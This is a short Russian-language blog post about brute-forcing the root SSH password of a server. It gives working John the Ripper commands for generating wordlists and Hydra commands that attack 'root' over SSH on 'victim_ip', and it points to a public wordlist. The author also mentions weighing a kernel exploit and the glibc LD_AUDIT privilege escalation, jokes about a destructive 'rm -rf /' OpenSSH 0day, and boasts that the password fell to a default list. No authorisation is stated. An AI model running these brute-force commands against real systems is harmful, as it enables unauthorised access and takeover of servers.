Пароли генерируются так:
john --incremental:Alpha –stdout --session=$john_sessionfile > jo_pw.txtточнее это не совсем пароли, а просто массив слов. Генерирует очень лихо, на 2х процессорной виртуалке за 10сек сгенерировал 33мио слов это ~250Мб файл - следите за свободным местом на hdd.
--session=$john_sessionfile Делается для того что бы в любой момент продолжить генерировать пароли с прерванного места:
john --restore=jo_session.job
Далее полученный массив jo_pw.txt скармливается брутфорсеру Hydra. Надо отметить на сегодняшний день аналогов этому брутфорсеру нет.
ПЛИ!
hydra -l root -P jo_pw.txt -vV -t 10-e ns victim_ip ssh2
Альтернативно, что б не совокупляться с Джоном, можно использовать публичный вордлист/public wordlist:
http://download.openwall.net/pub/wordlists/all.gz который содержит 3мио наиболее распространённых парольных фраз, и запустить гидру как
hydra -l root -P all.txt -vV -t 10-e ns victim_ip ssh2Для детального ознакомления с вопросом, так сказать, что бы погрузиться в ушат с помоями по уши, я б советовал покурить http://www.openwall.com/john/doc/EXAMPLES.shtml Но сразу скажу что наиболее интерестные ключи джона это:
–incremental:All ,
–incremental:Digits ,
–incremental:Alpha ,
–single, –rules
Запасной вариант, это ядерный эксплоит. Почему ядреный? потому как из софта на том сервере Только САП а его трогать никак нельзя. Ведро версии 2.6.16.60. Эксплоит в розыске.
Hydra ROCKz! ёбнула пароль по дефолтовой базёнке.
К этому моменту уже было желание применить вот это
GNU glibc Dynamic Linker 'LD_AUDIT' Local Privilege Escalation Vulnerabilityили таки найти рабочий 0day OpenSSH без rm -rf / , лол.
Комментариев нет:
Отправить комментарий